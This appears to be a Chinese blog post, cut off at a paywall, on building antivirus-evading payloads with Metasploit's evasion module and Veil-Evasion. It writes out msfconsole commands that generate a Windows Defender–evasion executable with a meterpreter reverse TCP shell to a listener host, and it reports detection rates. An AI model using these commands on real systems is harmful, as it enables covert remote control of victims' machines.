本文介绍了TideSec的Evasion模块,包括生成exe、hta和install_util的免杀技术及其查杀率,并详细讲解了Veil-Evasion的安装、Docker使用以及如何生成免杀exe。通过实验,Veil-Evasion展现出较好的免杀效果,但某些情况下可能被360等杀软拦截,且生成的exe文件体积较大。Veil-Evasion的潜力在于其shellcode的编译打包能力和与Metasploit的兼容性。
Evasion模块
参考链接:
applocker_evasion_install_util.md:
https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/evasion/windows/applocker_evasion_install_util.md
基于白名单Csc.exe执行payload:https://micro8.gitbook.io/micro8/contents-1/71-80/77-ji-yu-bai-ming-dan-csc.exe-zhi-hang-payload-di-qi-ji
使用veil绕过杀软:https://blog.youkuaiyun.com/wyf12138/article/details/79825833
免杀后门之MSF&Veil-Evasion的完美结合http://www.secist.com/archives/1107.html
APT级的全面免杀:https://xz.aliyun.com/t/4191
生成exe(VT查杀率42/71)
show evasion
use windows/windows_defender_exe
set filename test.exe
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.42.138
set LPORT 3333
run
handler -H 192.168.42.138 -P 3333 -p windows/meterpreter/reverse_tcp
jobs
virustotal.com中42/71个报毒
火绒以及360都会拦
最低0.47元/天 解锁文章
扫一扫
1589
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
